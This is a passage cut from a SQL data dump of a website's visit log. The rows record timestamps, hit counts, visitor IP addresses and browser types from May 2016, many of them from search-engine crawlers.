irefox'),(39642,1463473490,1,1,0,0,'46.201.254.78','chrome'),(39643,1463474444,1,1,0,0,'91.196.177.44','chrome'),(39644,1463475345,1,1,0,0,'91.196.177.44','chrome'),(39645,1463475865,1,1,0,0,'176.104.1.188','firefox'),(39646,1463475920,1,1,0,0,'194.187.216.46','chrome'),(39647,1463476035,1,1,0,0,'141.8.132.105','other'),(39648,1463477434,1,1,0,0,'91.196.178.69','firefox'),(39649,1463477739,1,1,0,0,'130.193.50.34','other'),(39650,1463478096,1,1,0,0,'31.135.122.1','chrome'),(39651,1463478178,1,1,0,0,'193.109.145.179','chrome'),(39652,1463478706,1,1,0,0,'141.8.132.105','other'),(39653,1463478763,1,1,0,0,'178.140.231.7','opera'),(39654,1463478883,1,1,0,0,'128.68.29.40','opera'),(39655,1463478895,1,1,0,0,'178.94.228.30','firefox'),(39656,1463478896,1,1,0,0,'91.196.178.69','firefox'),(39657,1463479590,2,2,0,0,'157.55.39.135','other'),(39658,1463480040,1,1,0,0,'5.255.253.113','other'),(39659,1463481123,1,1,0,0,'178.154.189.202','other'),(39660,1463481194,1,1,0,0,'130.193.50.34','other'),(39661,1463481225,53,53,0,0,'88.198.16.153','other'),(39662,1463481593,4,4,0,0,'69.30.236.2','other'),(39664,1463481594,1,1,0,0,'46.201.239.218','firefox'),(39665,1463482308,1,1,0,0,'91.196.178.167','chrome'),(39666,1463483428,1,1,0,0,'91.196.178.69','firefox'),(39667,1463485615,1,1,0,0,'194.44.238.62','chrome'),(39668,1463486290,1,1,0,0,'91.196.178.161','chrome'),(39669,1463486488,1,1,0,0,'178.93.20.60','chrome'),(39670,1463486848,1,1,0,0,'91.196.178.69','firefox'),(39671,1463487196,2,2,0,0,'37.53.224.253','chrome'),(39672,1463487884,1,1,0,0,'157.55.39.234','other'),(39673,1463487918,1,1,0,0,'82.145.211.188','other'),(39674,1463488052,1,1,0,0,'141.8.132.105','other'),(39675,1463488466,1,1,0,0,'91.196.178.69','firefox'),(39676,1463489058,1,0,1,0,'66.249.78.150',''),(39677,1463489411,1,1,0,0,'94.179.78.159','chrome'),(39678,1463489598,2,2,0,0,'130.193.50.34','other'),(39679,1463490347,1,1,0,0,'91.196.178.72','firefox'),(39680,1463491527,1,1,0,0,'37.54.135.51','chrome'),(39681,1463491548,1,1,0,0,'141.8.132.105','other'),(39682,1463491788,1,1,0,0,'87.244.177.76','chrome'),(39683,1463491838,2,2,0,0,'91.196.178.72','firefox'),(39684,1463492443,1,1,0,0,'37.54.135.51','chrome'),(39685,1463492710,1,1,0,0,'91.196.178.70','firefox'),(39686,1463492733,1,1,0,0,'141.8.132.105','other'),(39687,1463493393,1,1,0,0,'37.54.135.51','chrome'),(39688,1463493530,1,1,0,0,'80.254.155.43','chrome'),(39689,1463493698,1,1,0,0,'91.196.178.69','firefox'),(39690,1463494494,1,1,0,0,'130.193.50.34','other'),(39691,1463494860,1,1,0,0,'178.95.248.229','chrome'),(39692,1463496009,1,1,0,0,'5.255.253.113','other'),(39693,1463496095,14,0,14,0,'68.180.229.171',''),(39694,1463497482,1,0,1,0,'68.180.229.171',''),(39695,1463497714,1,1,0,0,'91.196.178.69','firefox'),(39696,1463497829,1,1,0,0,'5.255.253.113','other'),(39697,1463498738,1,1,0,0,'157.55.39.135','other'),(39698,1463498844,1,1,0,0,'5.255.253.113','other'),(39699,1463498896,1,1,0,0,'130.193.50.34','other'),(39700,1463499573,1,1,0,0,'141.8.183.25','other'),(39701,1463500689,1,1,0,0,'66.249.64.108','chrome'),(39702,1463500872,1,1,0,0,'130.193.50.34','other'),(39703,1463501918,1,1,0,0,'141.8.132.105','other'),(39704,1463502689,2,2,0,0,'141.8.183.25','other'),(39705,1463502834,1,1,0,0,'91.196.178.35','firefox'),(39706,1463503375,1,1,0,0,'130.193.50.34','other'),(39707,1463503480,1,1,0,0,'92.113.156.28','firefox'),(39708,1463503618,2,2,0,0,'91.196.178.72','firefox'),(39709,1463503834,1,1,0,0,'95.132.240.7','chrome'),(39710,1463504313,1,1,0,0,'130.193.50.34','other'),(39711,1463504564,1,1,0,0,'91.196.178.68','chrome'),(39712,1463504605,1,1,0,0,'92.113.156.28','firefox'),(39713,1463505226,2,2,0,0,'141.8.183.25','other'),(39714,1463505374,1,1,0,0,'141.8.132.105','other'),(39715,1463505562,1,1,0,0,'46.201.186.159','chrome'),(39716,1463506093,1,1,0,0,'207.46.13.176','other'),(39717,1463506126,1,1,0,0,'37.52.16.230','chrome'),(39718,1463506294,1,1,0,0,'91.196.178.68','chrome'),(39719,1463506914,1,1,0,0,'141.8.132.105','other'),(39720,1463507198,1,1,0,0,'91.196.178.34','chrome'),(39721,1463508000,1,1,0,0,'141.8.132.105','other'),(39722,1463508011,1,1,0,0,'141.8.183.25','other'),(39723,1463508249,3,3,0,0,'130.193.50.34','other'),(39724,1463509042,1,0,1,0,'66.249.64.249',''),(39725,1463509103,1,1,0,0,'157.55.39.135','other'),(39726,1463510468,1,1,0,0,'130.193.50.34','other'),(39727,1463510675,2,2,0,0,'8.37.235.149','other'),(39728,1463512454,1,1,0,0,'92.113.156.28','firefox'),(39729,1463512631,1,1,0,0,'141.8.183.25','other'),(39730,1463513192,1,1,0,0,'82.145.216.173','opera'),(39731,1463513409,2,2,0,0,'141.8.132.105','other'),(39732,1463513706,1,1,0,0,'130.193.50.34','other'),(39733,1463514539,1,1,0,0,'180.76.15.162','other'),(39734,1463516515,1,1,0,0,'141.8.132.105','other'),(39735,1463517701,1,1,0,0,'37.53.197.62','chrome'),(39736,1463517791,1,1,0,0,'40.77.167.45','other'),(39737,1463518244,1,1,0,0,'141.8.132.105','other'),(39738,1463522452,1,1,0,0,'93.158.152.75','other'),(39739,1463522750,1,1,0,0,'141.8.142.61','other'),(39740,1463523328,1,1,0,0,'91.196.178.69','chrome'),(39741,1463523940,2,2,0,0,'5.255.253.113','other'),(39742,1463524536,1,1,0,0,'141.8.132.105','other'),(39743,1463525072,1,1,0,0,'130.193.51.19','other'),(39744,1463525416,1,1,0,0,'37.9.122.202','other'),(39745,1463526211,1,1,0,0,'141.8.132.105','other'),(39746,1463526973,1,0,1,0,'66.249.64.118',''),(39747,1463527086,1,1,0,0,'130.193.50.34','other'),(39748,1463527862,1,1,0,0,'40.77.167.45','other'),(39749,1463528074,1,1,0,0,'141.8.183.25','other'),(39750,1463528961,1,1,0,0,'130.193.50.34','other'),(39751,1463529088,1,1,0,0,'141.8.183.25','other'),(39752,1463529193,3,3,0,0,'176.36.80.39','other'),(39753,1463529212,1,1,0,0,'5.255.253.113','other'),(39754,1463531589,1,1,0,0,'141.8.132.105','other'),(39755,1463532713,1,1,0,0,'180.76.15.33','other'),(39756,1463533086,1,1,0,0,'5.255.253.113','other'),(39757,1463534163,1,1,0,0,'136.243.152.18','other'),(39758,1463536308,1,1,0,0,'130.193.50.34','other'),(39759,1463536342,1,1,0,0,'141.8.183.25','other'),(39760,1463536907,2,2,0,0,'91.121.169.194','other'),(39761,1463537379,1,0,1,0,'66.249.64.113',''),(39762,1463537498,3,3,0,0,'141.8.132.105','other'),(39763,1463537626,1,1,0,0,'207.46.13.176','other'),(39764,1463538218,1,1,0,0,'130.193.50.34','other'),(39765,1463539314,1,1,0,0,'130.193.50.34','other'),(39766,1463540454,1,1,0,0,'141.8.132.105','other'),(39767,1463541909,1,0,1,0,'66.249.64.249',''),(39768,1463541989,1,1,0,0,'130.193.50.34','other'),(39769,1463542655,1,1,0,0,'141.8.132.105','other'),(39770,1463543204,1,1,0,0,'130.193.50.34','other'),(39771,1463544944,1,1,0,0,'141.8.132.105','other'),(39772,1463544983,4,4,0,0,'213.251.184.38','other'),(39773,1463546842,2,2,0,0,'130.193.50.34','other'),(39774,1463547260,1,1,0,0,'91.200.12.7','chrome'),(39775,1463548342,1,1,0,0,'91.196.178.66','firefox'),(39776,1463548367,1,1,0,0,'91.200.12.7','chrome'),(39777,1463549652,1,1,0,0,'66.249.93.147','chrome'),(39778,1463549976,1,1,0,0,'92.113.53.191','opera'),(39779,1463550018,1,1,0,0,'109.227.96.39','opera'),(39780,1463550036,1,1,0,0,'91.196.178.66','firefox'),(39781,1463550979,1,1,0,0,'141.8.132.105','other'),(39782,1463551400,1,1,0,0,'94.178.147.59','firefox'),(39783,1463551752,2,2,0,0,'130.193.50.34','other'),(39784,1463551918,1,0,1,0,'66.249.64.118',''),(39785,1463552324,1,1,0,0,'91.196.178.38','chrome'),(39786,1463552651,1,1,0,0,'5.255.253.113','other'),(39787,1463553480,1,1,0,0,'95.132.44.17','chrome'),(39788,1463553481,1,1,0,0,'31.128.100.166','chrome'),(39789,1463553882,1,1,0,0,'91.196.178.66','firefox'),(39790,1463554179,1,0,1,0,'66.249.64.118',''),(39791,1463554227,1,0,1,0,'66.249.64.244',''),(39792,1463554329,1,1,0,0,'141.8.132.105','other'),(39793,1463554525,1,1,0,0,'130.193.50.34','other'),(39794,1463555416,1,1,0,0,'82.207.91.234','firefox'),(39795,1463555832,1,1,0,0,'91.196.178.169','chrome'),(39796,1463556151,1,1,0,0,'91.196.178.66','firefox'),(39797,1463557818,1,1,0,0,'82.207.113.247','chrome'),(39798,1463557936,1,1,0,0,'5.255.253.113','other'),(39799,1463558391,1,1,0,0,'31.128.250.93','chrome'),(39800,1463558691,1,1,0,0,'141.8.183.25','other'),(39801,1463558817,2,2,0,0,'130.193.50.34','other'),(39802,1463559119,1,1,0,0,'91.196.178.66','firefox'),(39803,1463559542,1,1,0,0,'37.55.213.215','opera'),(39804,1463559558,1,1,0,0,'5.53.113.132','chrome'),(39805,1463559599,1,1,0,0,'91.196.178.163','firefox'),(39806,1463560857,2,2,0,0,'91.196.178.134','chrome'),(39807,1463560912,1,1,0,0,'5.255.253.113','other'),(39808,1463561170,1,1,0,0,'94.179.99.55','msie'),(39809,1463561607,1,1,0,0,'94.179.89.206','firefox'),(39810,1463561747,2,2,0,0,'130.193.50.34','other'),(39811,1463561791,1,1,0,0,'91.196.178.134','firefox'),(39812,1463561932,1,0,1,0,'66.249.64.118',''),(39813,1463562393,1,1,0,0,'5.255.253.113','other'),(39814,1463562640,1,1,0,0,'40.77.167.45','other'),(39815,1463562722,1,1,0,0,'141.8.183.25','other'),(39816,1463563273,1,1,0,0,'91.196.178.66','firefox'),(39817,1463563585,1,1,0,0,'130.180.216.202','opera'),(39818,1463563613,2,2,0,0,'141.8.132.105','other'),(39819,1463563688,1,1,0,0,'66.249.64.118','chrome'),(39820,1463564015,1,1,0,0,'94.179.126.231','firefox'),(39821,1463564444,1,1,0,0,'91.124.13.116','chrome'),(39822,1463565487,1,1,0,0,'91.196.178.66','firefox'),(39823,1463565868,1,1,0,0,'91.196.178.134','firefox'),(39824,1463566213,1,1,0,0,'46.73.162.90','chrome'),(39825,1463566215,1,1,0,0,'128.69.153.33','chrome'),(39826,1463566314,2,2,0,0,'178.154.189.202','other'),(39827,1463566569,1,1,0,0,'141.8.183.25','other'),(39828,1463567619,1,1,0,0,'91.196.178.68','msie'),(39829,1463568478,1,1,0,0,'5.255.253.113','other'),(39830,1463569100,1,1,0,0,'217.70.19.83','msie'),(39831,1463569175,1,1,0,0,'62.122.206.148','chrome'),(39832,1463569897,1,1,0,0,'141.8.142.25','other'),(39833,1463570165,1,1,0,0,'91.196.178.167','chrome'),(39834,1463570320,1,1,0,0,'91.196.178.66','firefox'),(39835,1463570578,1,1,0,0,'91.196.178.35','firefox'),(39836,1463570682,1,1,0,0,'195.225.144.85','chrome'),(39837,1463571287,1,1,0,0,'91.196.178.66','firefox'),(39838,1463571745,1,1,0,0,'195.225.144.85','chrome'),(39839,1463571827,1,1,0,0,'157.55.39.234','other'),(39840,1463572355,1,1,0,0,'130.193.50.34','other'),(39841,1463572368,1,1,0,0,'91.196.177.8','chrome'),(39842,1463572448,1,1,0,0,'82.145.216.123','opera'),(39843,1463572465,1,1,0,0,'91.196.178.66','firefox'),(39844,1463572800,3,3,0,0,'130.193.51.83','other'),(39845,1463572926,1,1,0,0,'5.255.253.113','other'),(39846,1463573220,1,1,0,0,'91.196.178.72','chrome'),(39847,1463573417,3,3,0,0,'141.8.132.105','other'),(39848,1463573964,1,1,0,0,'91.196.178.133','firefox'),(39849,1463574772,2,2,0,0,'91.196.178.72','chrome'),(39850,1463575301,1,1,0,0,'91.196.178.66','firefox'),(39851,1463575440,1,1,0,0,'66.249.64.239','chrome'),(39852,1463575967,1,1,0,0,'31.128.250.93','chrome'),(39853,1463576235,1,1,0,0,'130.193.50.34','other'),(39854,1463576294,1,1,0,0,'141.8.183.25','other'),(39855,1463576421,2,2,0,0,'5.255.253.113','other'),(39856,1463576427,1,1,0,0,'141.8.132.105','other'),(39857,1463576539,1,1,0,0,'37.53.227.90','chrome'),(39858,1463576700,1,1,0,0,'188.239.70.201','chrome'),(39859,1463577207,1,1,0,0,'94.179.1.242','chrome'),(39860,1463577222,2,2,0,0,'94.179.15.73','firefox'),(39861,1463577950,1,1,0,0,'94.179.73.235','firefox'),(39862,1463578742,1,1,0,0,'91.196.178.66','firefox'),(39863,1463579185,1,1,0,0,'157.55.39.247','other'),(39864,1463579500,1,1,0,0,'130.193.50.34','other'),(39865,1463579776,1,1,0,0,'130.180.216.233','firefox'),(39866,1463579798,1,1,0,0,'5.255.253.113','other'),(39867,1463580002,1,1,0,0,'141.8.132.101','other'),(39868,1463580500,2,2,0,0,'141.8.132.105','other'),(39869,1463580667,1,1,0,0,'94.153.192.46','firefox'),(39870,1463581222,1,1,0,0,'91.196.178.165','chrome'),(39871,1463581378,1,1,0,0,'62.122.207.77','chrome'),(39872,1463581636,2,2,0,0,'141.8.132.105','other'),(39873,1463581781,1,1,0,0,'212.90.61.31','chrome'),(39874,1463582436,1,1,0,0,'130.193.50.34','other'),(39875,1463582483,1,1,0,0,'66.102.9.93','chrome'),(39876,1463583043,1,1,0,0,'207.46.13.176','other'),(39877,1463583853,1,1,0,0,'91.196.178.70','firefox'),(39878,1463583874,1,1,0,0,'91.196.178.34','chrome'),(39879,1463585008,1,1,0,0,'130.193.50.34','other'),(39880,1463586406,1,1,0,0,'93.72.227.7','firefox'),(39881,1463586592,1,1,0,0,'82.145.209.90','opera'),(39882,1463586958,1,1,0,0,'130.193.50.34','other'),(39883,1463587637,1,1,0,0,'85.114.213.59','chrome'),(39884,1463587839,1,1,0,0,'37.54.19.177','firefox'),(39885,1463587938,1,0,1,0,'66.249.66.79',''),(39886,1463587944,1,0,1,0,'66.249.66.57',''),(39887,1463588978,1,1,0,0,'213.179.252.35','chrome'),(39888,1463589501,1,1,0,0,'82.145.209.90','opera'),(39889,1463589999,1,1,0,0,'91.142.167.70','chrome'),(39890,1463590401,1,1,0,0,'157.55.39.247','other'),(39891,1463591067,1,1,0,0,'91.196.178.72','chrome'),(39892,1463591376,1,1,0,0,'37.54.19.177','firefox'),(39893,1463591730,1,1,0,0,'5.255.253.113','other'),(39894,1463592528,1,1,0,0,'193.194.127.217','firefox'),(39895,1463592752,1,1,0,0,'141.8.132.105','other'),(39896,1463593407,1,1,0,0,'91.196.178.69','chrome'),(39897,1463593807,1,1,0,0,'66.249.66.76','chrome'),(39898,1463593957,1,1,0,0,'94.179.75.37','firefox'),(39899,1463594234,1,1,0,0,'130.193.50.34','other'),(39900,1463594460,1,1,0,0,'157.55.39.247','other'),(39901,1463594609,1,0,1,0,'66.249.66.82',''),(39902,1463595197,2,2,0,0,'130.193.50.34','other'),(39903,1463595217,1,1,0,0,'93.79.35.160','chrome'),(39904,1463595794,1,1,0,0,'141.8.183.25','other'),(39905,1463596396,1,1,0,0,'37.54.19.177','firefox'),(39906,1463596606,1,1,0,0,'46.211.69.115','chrome'),(39907,1463596763,1,1,0,0,'141.8.183.25','other'),(39908,1463596943,1,1,0,0,'141.8.132.105','other'),(39909,1463597357,1,1,0,0,'82.145.219.129','opera'),(39910,1463598616,1,1,0,0,'91.196.178.130','chrome'),(39911,1463598637,2,2,0,0,'130.193.50.34','other'),(39912,1463598761,1,1,0,0,'82.145.219.129','opera'),(39913,1463599411,1,1,0,0,'130.193.51.19','other'),(39914,1463599524,1,1,0,0,'66.249.66.82','chrome'),(39915,1463599689,1,1,0,0,'217.196.173.139','chrome'),(39916,1463600183,1,1,0,0,'141.8.183.25','other'),(39917,1463600213,1,1,0,0,'80.64.80.159','chrome'),(39918,1463600336,1,1,0,0,'130.193.50.34','other'),(39919,1463601454,1,1,0,0,'141.8.183.25','other'),(39920,1463602444,1,1,0,0,'157.55.39.234','other'),(39921,1463602859,1,1,0,0,'82.145.221.194','chrome'),(39922,1463603507,1,1,0,0,'130.193.51.83','other'),(39923,1463603933,1,1,0,0,'130.193.51.19','other'),(39924,1463604312,1,1,0,0,'141.8.142.25','other'),(39925,1463606044,1,0,1,0,'66.249.66.76',''),(39926,1463606149,1,1,0,0,'91.196.178.69','chrome'),(39927,1463608120,1,1,0,0,'5.255.253.113','other'),(39928,1463608315,3,3,0,0,'130.193.50.34','other'),(39929,1463608370,1,1,0,0,'141.8.132.105','other'),(39930,1463610290,8,8,0,0,'207.46.13.176','other'),(39931,1463610453,4,4,0,0,'130.193.50.34','other'),(39932,1463610784,1,1,0,0,'141.8.132.105','other'),(39933,1463611319,1,1,0,0,'178.154.189.202','other'),(39934,1463613276,1,1,0,0,'141.8.183.25','other'),(39935,1463613429,2,2,0,0,'130.193.50.34','other'),(39936,1463615696,9,9,0,0,'157.55.39.234','other'),(39937,1463617265,1,1,0,0,'141.8.183.25','other'),(39938,1463620405,1,1,0,0,'141.8.132.105','other'),(39939,1463621380,1,1,0,0,'66.249.66.79','chrome'),(39940,1463621504,1,0,1,0,'66.249.66.57',''),(39941,1463623929,1,1,0,0,'141.8.183.25','other'),(39942,1463624002,1,1,0,0,'195.34.204.152','chrome'),(39943,1463624072,1,1,0,0,'130.193.50.34','other'),(39944,1463624489,1,1,0,0,'89.178.116.185','msie'),(39945,1463624656,1,1,0,0,'141.8.132.105','other'),(39946,1463626349,1,1,0,0,'95.213.218.92','other'),(39947,1463627228,1,1,0,0,'37.115.72.239','chrome'),(39948,1463627640,1,1,0,0,'157.55.39.247','other'),(39949,1463628056,1,1,0,0,'130.193.50.34','other'),(39950,1463628510,1,0,1,0,'66.249.66.76',''),(39951,1463629005,1,1,0,0,'93.180.64.220','other'),(39952,1463629324,2,2,0,0,'130.193.50.34','other'),(39953,1463629501,1,1,0,0,'128.69.183.91','msie'),(39954,1463631866,1,1,0,0,'157.55.39.247','other'),(39955,1463632072,1,1,0,0,'5.83.17.180','chrome'),(39956,1463632167,1,1,0,0,'141.8.183.25','other'),(39957,1463632305,1,1,0,0,'95.27.87.18','msie'),(39958,1463635178,1,1,0,0,'91.196.178.66','firefox'),(39959,1463635216,1,1,0,0,'178.154.189.202','other'),(39960,1463635343,2,0,2,0,'66.249.66.79',''),(39961,1463636061,1,1,0,0,'95.213.218.92','other'),(39962,1463636725,1,1,0,0,'141.8.183.25','other'),(39963,1463637014,1,1,0,0,'180.76.15.157','other'),(39964,1463637274,1,1,0,0,'130.193.50.34','other'),(39965,1463637506,1,1,0,0,'178.154.189.202','other'),(39966,1463637540,1,1,0,0,'5.255.253.113','other'),(39967,1463637648,1,1,0,0,'66.249.93.147','chrome'),(39968,1463638118,1,1,0,0,'141.8.132.105','other'),(39969,1463638859,1,1,0,0,'207.46.13.176','other'),(39970,1463638925,1,1,0,0,'40.77.167.45','other'),(39971,1463639417,1,1,0,0,'141.8.132.105','other'),(39972,1463639672,2,2,0,0,'130.193.50.34','other'),(39973,1463639820,1,0,1,0,'68.180.229.171',''),(39974,1463640869,1,1,0,0,'91.196.178.66','firefox'),(39975,1463640961,1,1,0,0,'141.8.142.61','other'),(39976,1463641363,1,1,0,0,'130.193.51.83','other'),(39977,1463642006,1,1,0,0,'141.8.132.105','other'),(39978,1463642156,1,1,0,0,'91.196.178.169','chrome'),(39979,1463642284,1,1,0,0,'91.196.178.166','firefox'),(39980,1463642530,1,1,0,0,'109.227.97.185','opera'),(39981,1463642764,1,1,0,0,'95.134.168.215','chrome'),(39982,1463645216,1,1,0,0,'130.193.50.201','other'),(39983,1463646291,1,1,0,0,'130.193.37.7','other'),(39984,1463646437,1,1,0,0,'91.196.178.66','other'),(39985,1463647363,1,1,0,0,'94.179.114.176','firefox'),(39986,1463648095,3,3,0,0,'130.193.50.34','other'),(39987,1463648379,1,1,0,0,'195.5.54.246','firefox'),(39988,1463649348,1,1,0,0,'5.255.253.113','other'),(39989,1463649970,1,1,0,0,'91.196.178.66','firefox'),(39990,1463649977,1,1,0,0,'91.196.178.66','chrome'),(39991,1463650037,1,1,0,0,'91.196.178.65','chrome'),(39992,1463650668,2,2,0,0,'95.134.168.215','chrome'),(39993,1463651230,1,1,0,0,'91.222.155.161','chrome'),(39994,1463651616,1,1,0,0,'91.196.178.65','chrome'),(39995,1463652022,186,186,0,0,'51.255.36.88','other'),(39996,1463652606,1,1,0,0,'5.255.253.113','other'),(39997,1463652920,1,1,0,0,'157.55.39.247','other'),(39998,1463652944,1,1,0,0,'176.14.111.74','msie'),(39999,1463653175,1,1,0,0,'91.196.178.69','firefox'),(40000,1463653883,1,0,1,0,'66.249.66.82',''),(40001,1463655161,1,1,0,0,'141.8.183.25','other'),(40002,1463655758,1,1,0,0,'5.255.253.113','other'),(40003,1463655870,2,2,0,0,'62.122.207.77','chrome'),(40004,1463656576,1,1,0,0,'91.192.132.242','firefox'),(40005,1463656781,1,1,0,0,'91.196.178.72','chrome'),(40006,1463657665,1,1,0,0,'62.122.207.77','chrome'),(40007,1463658094,1,1,0,0,'91.196.178.69','chrome'),(40008,1463658152,1,1,0,0,'95.132.6.62','opera'),(40009,1463658266,1,1,0,0,'91.196.178.66','firefox'),(40010,1463659154,126,126,0,0,'5.9.85.4','other'),(40011,1463659643,1,1,0,0,'141.8.132.105','other'),(40012,1463659920,300,300,0,0,'144.76.8.132','other'),(40013,1463661144,1,1,0,0,'91.196.178.66','firefox'),(40014,1463661847,1,1,0,0,'157.55.39.251','other'),(40015,1463662248,2,2,0,0,'130.193.50.34','other'),(40016,1463662250,2,2,0,0,'141.8.132.105','other'),(40017,1463662327,2,2,0,0,'91.196.178.66','firefox'),(40018,1463662602,1,1,0,0,'91.196.178.66','chrome'),(40019,1463663256,1,1,0,0,'91.196.178.66','firefox'),(40020,1463663477,2,2,0,0,'40.77.167.45','other'),(40021,1463663628,1,1,0,0,'91.196.178.135','chrome'),(40022,1463663937,2,2,0,0,'130.193.50.34','other'),(40023,1463663939,1,1,0,0,'141.8.142.58','other'),(40024,1463664783,1,1,0,0,'91.196.178.65','chrome'),(40025,1463665100,2,2,0,0,'91.196.178.66','firefox'),(40026,1463666331,1,1,0,0,'91.196.178.66','firefox'),(40027,1463666663,2,2,0,0,'37.54.17.10','firefox'),(40028,1463666748,1,1,0,0,'91.196.177.94','firefox'),(40029,1463667355,1,1,0,0,'91.196.178.66','firefox'),(40030,1463667497,1,1,0,0,'91.196.178.65','chrome'),(40031,1463667792,1,1,0,0,'66.249.66.79','chrome'),(40032,1463667861,1,1,0,0,'46.211.156.100','chrome'),(40033,1463668527,2,2,0,0,'130.193.50.34','other'),(40034,1463669560,2,2,0,0,'130.193.50.34','other'),(40035,1463670312,1,1,0,0,'91.196.178.68','chrome'),(40036,1463671087,9,9,0,0,'157.55.39.247','other'),(40037,1463671096,47,47,0,0,'157.55.39.251','other'),(40038,1463671126,58,58,0,0,'207.46.13.176','other'),(40039,1463672417,1,1,0,0,'94.179.54.68','other'),(40040,1463673256,1,1,0,0,'37.55.226.28','firefox'),(40041,1463673958,1,0,1,0,'66.249.66.79',''),(40042,1463675717,1,1,0,0,'37.55.226.28','firefox'),(40043,1463675900,1,1,0,0,'130.193.50.34','other'),(40044,1463676123,1,1,0,0,'178.93.150.89','chrome'),(40045,1463676886,1,1,0,0,'37.55.226.28','firefox'),(40046,1463677226,1,1,0,0,'130.193.50.34','other'),(40047,1463677764,1,1,0,0,'91.196.178.35','firefox'),(40048,1463678040,1,1,0,0,'37.55.226.28','firefox'),(40049,1463678392,1,1,0,0,'130.193.50.34','other'),(40050,1463678685,1,0,1,0,'66.249.66.54',''),(40051,1463679128,1,1,0,0,'5.255.253.113','other'),(40052,1463679399,2,2,0,0,'141.8.132.105','other'),(40053,1463679704,1,1,0,0,'130.193.50.34','other'),(40054,1463680191,1,1,0,0,'91.196.178.35','firefox'),(40055,1463681537,1,1,0,0,'37.55.226.28','firefox'),(40056,1463682114,1,0,1,0,'66.249.66.57',''),(40057,1463683684,1,1,0,0,'130.193.51.19','other'),(40058,1463685811,1,1,0,0,'51.255.65.58','other'),(40059,1463687085,23,23,0,0,'51.254.141.5','other'),(40060,1463687364,1,1,0,0,'141.8.183.25','other'),(40061,1463687996,1,1,0,0,'130.193.50.34','other'),(40062,1463688670,1,1,0,0,'93.79.238.50','firefox'),(40063,1463690018,1,1,0,0,'95.213.218.106','other'),(40064,1463691321,1,1,0,0,'157.55.39.251','other'),(40065,1463691505,1,1,0,0,'141.8.132.105','other'),(40066,1463691821,1,1,0,0,'141.8.183.25','other'),(40067,1463692146,1,1,0,0,'130.193.51.19','other'),(40068,1463692201,1,1,0,0,'141.8.142.58','other'),(40069,1463692532,1,1,0,0,'141.8.132.105','other'),(40070,1463694018,1,1,0,0,'180.76.15.7','other'),(40071,1463697614,1,1,0,0,'130.193.51.83','other'),(40072,1463700099,1,1,0,0,'130.193.50.34','other'),(40073,1463702383,1,1,0,0,'141.8.132.105','other'),(40074,1463702584,1,1,0,0,'40.77.167.45','other'),(40075,1463704060,1,1,0,0,'66.249.66.76','chrome'),(40076,1463704264,1,1,0,0,'207.46.13.184','other'),(40077,1463704730,1,1,0,0,'66.249.66.54','chrome'),(40078,1463705025,1,1,0,0,'141.8.183.25','other'),(40079,1463705179,1,1,0,0,'141.8.132.105','other'),(40080,1463705331,1,1,0,0,'130.193.50.34','other'),(40081,1463706904,1,0,1,0,'66.249.66.79',''),(40082,1463707230,1,1,0,0,'130.193.51.19','other'),(40083,1463707233,1,1,0,0,'178.154.189.37','other'),(40084,1463709386,1,0,1,0,'66.249.66.82',''),(40085,1463710069,1,1,0,0,'93.158.152.51','other'),(40086,1463710199,1,1,0,0,'141.8.142.78','other'),(40087,1463710406,1,1,0,0,'141.8.183.25','other'),(40088,1463711508,1,1,0,0,'37.55.226.28','other'),(40089,1463711858,1,1,0,0,'40.77.167.45','other'),(40090,1463712690,1,1,0,0,'141.8.132.105','other'),(40091,1463713225,1,1,0,0,'178.154.189.202','other'),(40092,1463714116,1,1,0,0,'5.255.253.113','other'),(40093,1463714873,1,1,0,0,'141.8.132.105','other'),(40094,1463714898,1,1,0,0,'207.46.13.176','other'),(40095,1463719939,1,1,0,0,'141.8.132.105','other'),(40096,1463719943,1,1,0,0,'157.55.39.251','other'),(40097,1463720299,1,1,0,0,'130.193.50.34','other'),(40098,1463720867,1,1,0,0,'94.179.75.35','firefox'),(40099,1463721285,1,1,0,0,'91.196.178.69','firefox'),(40100,1463721332,1,1,0,0,'77.222.134.250','firefox'),(40101,1463721386,1,1,0,0,'66.249.66.82','chrome'),(40102,1463721395,2,2,0,0,'40.77.167.45','other'),(40103,1463721656,1,1,0,0,'66.249.66.60','chrome'),(40104,1463722204,1,1,0,0,'91.196.178.162','chrome'),(40105,1463722207,1,0,1,0,'66.249.66.54',''),(40106,1463722239,1,1,0,0,'141.8.132.105','other'),(40107,1463722374,1,1,0,0,'66.249.93.147','chrome'),(40108,1463722765,1,1,0,0,'207.46.13.184','other'),(40109,1463723090,1,0,1,0,'66.249.69.180',''),(40110,1463723250,1,1,0,0,'141.8.132.52','other'),(40111,1463723966,1,1,0,0,'178.92.171.89','chrome'),(40112,1463724222,1,1,0,0,'91.225.109.182','chrome'),(40113,1463724325,1,1,0,0,'207.46.13.176','other'),(40114,1463724563,1,1,0,0,'91.196.178.69','firefox'),(40115,1463725231,1,1,0,0,'207.46.13.184','other'),(40116,1463725526,1,1,0,0,'91.225.109.182','chrome'),(40117,1463725532,1,0,1,0,'66.249.66.79',''),(40118,1463725901,1,1,0,0,'130.193.50.38','other'),(40119,1463725905,1,1,0,0,'141.8.142.61','other'),(40120,1463726870,1,1,0,0,'91.196.178.69','firefox'),(40121,1463727013,1,1,0,0,'130.193.50.38','other'),(40122,1463727334,2,2,0,0,'62.122.207.77','chrome'),(40123,1463727962,1,1,0,0,'157.55.39.251','other'),(40124,1463728219,1,1,0,0,'195.225.144.85','chrome'),(40125,1463728820,1,1,0,0,'94.179.82.190','firefox'),(40126,1463729368,1,1,0,0,'91.196.178.66','firefox'),(40127,1463729598,1,1,0,0,'91.196.178.65','chrome'),(40128,1463729621,1,1,0,0,'130.193.50.38','other'),(40129,1463729777,1,1,0,0,'40.77.167.45','other'),(40130,1463730055,2,2,0,0,'91.196.178.68','firefox'),(40131,1463730136,1,1,0,0,'37.53.230.73','firefox'),(40132,1463730317,1,1,0,0,'130.180.219.25','firefox'),(40133,1463730332,1,1,0,0,'130.193.50.34','other'),(40134,1463730498,1,1,0,0,'91.196.178.67','chrome'),(40135,1463731269,1,1,0,0,'91.196.178.135','firefox'),(40136,1463731301,1,1,0,0,'141.8.183.25','other'),(40137,1463733620,1,1,0,0,'91.196.178.135','firefox'),(40138,1463733636,1,1,0,0,'94.178.254.237','chrome'),(40139,1463734111,1,0,1,0,'66.249.66.60',''),(40140,1463734779,1,1,0,0,'91.196.178.69','chrome'),(40141,1463735360,1,1,0,0,'40.77.167.45','other'),(40142,1463735780,1,1,0,0,'130.193.51.83','other'),(40143,1463736064,2,2,0,0,'91.196.178.66','firefox'),(40144,1463736696,1,1,0,0,'141.8.183.25','other'),(40145,1463737774,1,1,0,0,'157.55.39.251','other'),(40146,1463738017,1,1,0,0